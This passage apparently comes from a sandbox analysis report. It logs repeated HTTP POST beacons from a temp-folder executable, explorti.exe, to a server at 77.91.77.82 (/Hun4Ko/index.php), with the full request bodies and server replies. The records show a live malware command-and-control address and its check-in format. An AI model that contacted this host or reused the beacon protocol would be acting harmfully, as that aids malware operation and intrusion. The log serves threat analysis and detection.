                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:16.527744055 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:16 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    12192.168.2.44974977.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:16.648510933 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:17.363126040 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:17 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:17.365453959 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:17.594145060 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:17 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    13192.168.2.44975077.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:17.706784010 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:18.398535967 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:18 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:18.399399042 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:18.616611958 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:18 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    14192.168.2.44975177.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:18.737929106 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:19.432054043 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:19 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:19.432748079 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:19.648850918 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:19 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    15192.168.2.44975277.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:19.769524097 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:20.471168995 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:20 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:20.473938942 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:20.691514969 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:20 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    16192.168.2.44975377.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:20.816206932 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:21.551939964 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:21 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:21.552846909 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:21.780407906 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:21 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    17192.168.2.44975477.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:21.894308090 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:22.605396032 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:22 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:22.606164932 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:22.831770897 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:22 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    18192.168.2.44975577.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:22.941123962 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:23.662369013 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:23 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:23.670679092 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:23.896245003 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:23 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    19192.168.2.44975677.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:24.003942013 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:24.715133905 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:24 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:24.716074944 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:24.936079979 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:24 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    20192.168.2.44975777.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:25.052263975 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:25.773075104 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:25 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:25.773895025 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:25.999701023 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:25 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    21192.168.2.44975877.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:26.113531113 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:26.824183941 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:26 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:26.825114012 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:27.052367926 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:26 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    22192.168.2.44975977.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:27.159976006 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:27.883590937 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:27 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:27.884572983 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:28.108021975 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:27 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    23192.168.2.44976077.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:28.223864079 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:28.925721884 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:28 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:28.929181099 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
